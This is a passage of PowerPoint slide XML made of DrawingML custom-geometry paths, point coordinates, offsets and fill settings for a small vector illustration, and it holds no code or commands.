                    <a:pt x="508981" y="355374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512555" y="355374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460673" y="4522"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="513714" h="440689">
                  <a:moveTo>
                    <a:pt x="7343" y="82978"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4520" y="86895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7843" y="86312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7343" y="82978"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="513714" h="440689">
                  <a:moveTo>
                    <a:pt x="7843" y="86312"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4520" y="86895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7931" y="86895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7843" y="86312"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="513714" h="440689">
                  <a:moveTo>
                    <a:pt x="26850" y="82978"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7343" y="82978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7843" y="86312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26850" y="82978"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="513714" h="440689">
                  <a:moveTo>
                    <a:pt x="453677" y="4522"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="454105" y="7417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454196" y="8031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457698" y="7417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453677" y="452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D6FDBAD6-0BED-3979-872D-A226D3F9C768}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5860547" y="2603876"/>
              <a:ext cx="414020" cy="347980"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="414020" h="347980">
                  <a:moveTo>
                    <a:pt x="373034" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="63351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42088" y="347857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413393" y="281050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373034" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="1B3D6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0E59CE6B-53F4-954D-48A2-9525DC19C8A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68042" y="2914874"/>
              <a:ext cx="672269" cy="181415"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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816A41F3-2944-761A-165B-0E118CB78BC7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5869183" y="2911472"/>
              <a:ext cx="451484" cy="85090"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="451485" h="85089">
                  <a:moveTo>
                    <a:pt x="450290" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="77749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1177" y="84552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="451474" y="6803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45029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20FC7DD3-BA00-73AC-7D8F-1403C2A55818}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5932030" y="2927553"/>
              <a:ext cx="428625" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="428625" h="95250">
                  <a:moveTo>
                    <a:pt x="72072" y="72567"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="38633" y="60464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="64503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33439" y="77177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72072" y="72567"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="428625" h="95250">
                  <a:moveTo>
                    <a:pt x="121081" y="88112"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="87642" y="77177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49009" y="81775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82448" y="95021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121081" y="88112"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="428625" h="95250">
                  <a:moveTo>
                    <a:pt x="131457" y="62191"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="97447" y="50101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60540" y="57010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92824" y="67386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131457" y="62191"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="428625" h="95250">
                  <a:moveTo>
                    <a:pt x="190271" y="50685"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="157403" y="39738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118770" y="46075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152222" y="57594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190271" y="50685"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="428625" h="95250">
                  <a:moveTo>
                    <a:pt x="250228" y="40894"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="216789" y="31102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178155" y="35699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211607" y="48945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250228" y="40894"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="428625" h="95250">
                  <a:moveTo>
                    <a:pt x="309041" y="32245"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="273875" y="20154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235242" y="24765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269836" y="37426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309041" y="32245"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="428625" h="95250">
                  <a:moveTo>
                    <a:pt x="367855" y="22453"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="333260" y="9791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295783" y="17272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330377" y="27647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367855" y="22453"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="428625" h="95250">
                  <a:moveTo>
                    <a:pt x="428383" y="10934"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="393217" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354584" y="6337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389178" y="17856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428383" y="10934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9AA3DFA3-3052-7CB9-7F1B-A65CDB8DE5DB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5976390" y="3003543"/>
              <a:ext cx="81915" cy="20320"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="81914" h="20319">
                  <a:moveTo>
                    <a:pt x="43403" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="5175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37976" y="20218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50601" y="17961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38521" y="17961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10664" y="6926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4796" y="6926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5022" y="5175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5081" y="4714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23339" y="4714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43163" y="2350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50584" y="2350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43403" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81914" h="20319">
                  <a:moveTo>
                    <a:pt x="72009" y="11789"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="37512" y="17961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50601" y="17961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77139" y="13215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76367" y="13215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72009" y="11789"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81914" h="20319">
                  <a:moveTo>
                    <a:pt x="50584" y="2350"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="43163" y="2350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76367" y="13215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76489" y="11789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76563" y="10931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76802" y="10931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50584" y="2350"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81914" h="20319">
                  <a:moveTo>
                    <a:pt x="79422" y="11789"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="76489" y="11789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76367" y="13215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77139" y="13215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81433" y="12447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79422" y="11789"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81914" h="20319">
                  <a:moveTo>
                    <a:pt x="76802" y="10931"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="72009" y="11789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79422" y="11789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76802" y="10931"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81914" h="20319">
                  <a:moveTo>
                    <a:pt x="5081" y="4714"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4866" y="6388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4796" y="6926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9306" y="6388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5081" y="4714"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81914" h="20319">
                  <a:moveTo>
                    <a:pt x="9306" y="6388"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4796" y="6926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10664" y="6926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9306" y="6388"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81914" h="20319">
                  <a:moveTo>
                    <a:pt x="23339" y="4714"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5081" y="4714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9306" y="6388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23339" y="4714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661A26BA-DFBA-2231-574C-68E581A5FA2D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6041011" y="2994927"/>
              <a:ext cx="71755" cy="18415"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="71754" h="18414">
                  <a:moveTo>
                    <a:pt x="37476" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32287" y="17853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71493" y="12670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5911DF4D-09B9-5CBB-2B72-BFF1D6B411A8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6036498" y="2993753"/>
              <a:ext cx="81280" cy="20320"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="81279" h="20319">
                  <a:moveTo>
                    <a:pt x="42127" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="5175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36646" y="20211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53668" y="17961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37238" y="17961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10341" y="6926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4650" y="6926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4888" y="5175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4950" y="4714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22639" y="4714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41846" y="2353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48446" y="2353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42127" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81279" h="20319">
                  <a:moveTo>
                    <a:pt x="71258" y="13308"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="36065" y="17961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53668" y="17961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76616" y="14927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75606" y="14927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71258" y="13308"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81279" h="20319">
                  <a:moveTo>
                    <a:pt x="48446" y="2353"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="41846" y="2353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75606" y="14927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75807" y="13308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75887" y="12664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76128" y="12664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48446" y="2353"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81279" h="20319">
                  <a:moveTo>
                    <a:pt x="77857" y="13308"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="75807" y="13308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75673" y="14382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75606" y="14927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76616" y="14927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80741" y="14382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77857" y="13308"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81279" h="20319">
                  <a:moveTo>
                    <a:pt x="76128" y="12664"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="71258" y="13308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77857" y="13308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76128" y="12664"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81279" h="20319">
                  <a:moveTo>
                    <a:pt x="4950" y="4714"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4723" y="6388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4650" y="6926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9029" y="6388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4950" y="4714"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81279" h="20319">
                  <a:moveTo>
                    <a:pt x="9029" y="6388"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4650" y="6926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10341" y="6926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9029" y="6388"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81279" h="20319">
                  <a:moveTo>
                    <a:pt x="22639" y="4714"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4950" y="4714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9029" y="6388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22639" y="4714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AC5382CE-9B1E-F647-7183-4F766B18F9BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6099819" y="2985137"/>
              <a:ext cx="71755" cy="16510"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="71754" h="16510">
                  <a:moveTo>
                    <a:pt x="38629" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="5759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33440" y="16125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71493" y="10942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38629" y="0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ADA26931-BA73-93FC-A540-76105301B59A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6094653" y="2983954"/>
              <a:ext cx="81915" cy="19050"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="81914" h="19050">
                  <a:moveTo>
                    <a:pt x="43895" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5254" y="5766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5484" y="5766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5424" y="6550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5299" y="8192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38506" y="18483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55207" y="16210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38944" y="16210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13081" y="8192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4568" y="8192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10316" y="7335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7783" y="6550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15584" y="6550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43693" y="2359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50978" y="2359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43895" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81914" h="19050">
                  <a:moveTo>
                    <a:pt x="71595" y="11649"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="38114" y="16210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55207" y="16210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76286" y="13341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76676" y="13341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71595" y="11649"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81914" h="19050">
                  <a:moveTo>
                    <a:pt x="50978" y="2359"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="43693" y="2359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76676" y="13341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76314" y="13341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76382" y="12601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76469" y="11649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76534" y="10946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76758" y="10946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50978" y="2359"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81914" h="19050">
                  <a:moveTo>
                    <a:pt x="78869" y="11649"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="76469" y="11649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76382" y="12601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76314" y="13341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81725" y="12601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78869" y="11649"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81914" h="19050">
                  <a:moveTo>
                    <a:pt x="76758" y="10946"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="71595" y="11649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78869" y="11649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76758" y="10946"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81914" h="19050">
                  <a:moveTo>
                    <a:pt x="5254" y="5766"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="6550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5299" y="8192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5424" y="6550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7783" y="6550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5254" y="5766"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81914" h="19050">
                  <a:moveTo>
                    <a:pt x="10316" y="7335"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4568" y="8192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13081" y="8192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10316" y="7335"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81914" h="19050">
                  <a:moveTo>
                    <a:pt x="15584" y="6550"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7783" y="6550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10316" y="7335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15584" y="655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FE04BACC-DFFE-AFFF-F1BF-38A9CAE34E03}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6158624" y="2945409"/>
              <a:ext cx="250825" cy="46355"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="250825" h="46355">
                  <a:moveTo>
                    <a:pt x="72072" y="40881"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="38633" y="28219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="35699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33439" y="46075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72072" y="40881"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="250825" h="46355">
                  <a:moveTo>
                    <a:pt x="131457" y="30518"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="97434" y="19570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57658" y="24180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92252" y="37426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131457" y="30518"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="250825" h="46355">
                  <a:moveTo>
                    <a:pt x="189687" y="21882"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="155092" y="9791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117614" y="14389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152209" y="27063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189687" y="21882"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="250825" h="46355">
                  <a:moveTo>
                    <a:pt x="250799" y="10363"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="215633" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176999" y="5753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211594" y="15544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250799" y="10363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A759BF63-537D-CD55-86DE-F29F0744D425}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6145368" y="2978802"/>
              <a:ext cx="248920" cy="60325"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="248920" h="60325">
                  <a:moveTo>
                    <a:pt x="166049" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="28220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83024" y="59895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248497" y="29947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16604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1C9507EA-5F07-DB8F-3579-5A497806FDFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5866889" y="2992624"/>
              <a:ext cx="223520" cy="105410"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="223520" h="105410">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
